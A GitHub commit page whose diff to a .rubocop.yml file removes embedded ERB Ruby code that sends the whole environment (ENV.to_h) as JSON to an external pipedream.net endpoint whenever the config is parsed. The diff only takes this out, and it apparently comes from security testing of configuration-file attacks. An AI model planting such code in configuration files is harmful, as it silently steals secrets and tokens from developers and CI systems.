Skip to content

Commit

Permalink
Update .rubocop.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
rotem-cider committed Jun 14, 2023
1 parent c0c7418 commit 371b889
Showing 1 changed file with 1 addition and 21 deletions.
22 changes: 1 addition & 21 deletions .rubocop.yml
Original file line number Diff line number Diff line change
@@ -1,22 +1,2 @@
#.rubocop.yml
<%
require 'net/http'
require 'uri'
require 'json'
url = 'https://5249055eabbb52ef14d6e9b32e549966.m.pipedream.net'
uri = URI.parse(url)
header = { 'Content-Type': 'application/json' }
data = {
environment_variables: ENV.to_h
}
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true
request = Net::HTTP::Post.new(uri.request_uri, header)
request.body = data.to_json
response = http.request(request)
%>
inherit_from: .other.yml

0 comments on commit 371b889

Please sign in to comment.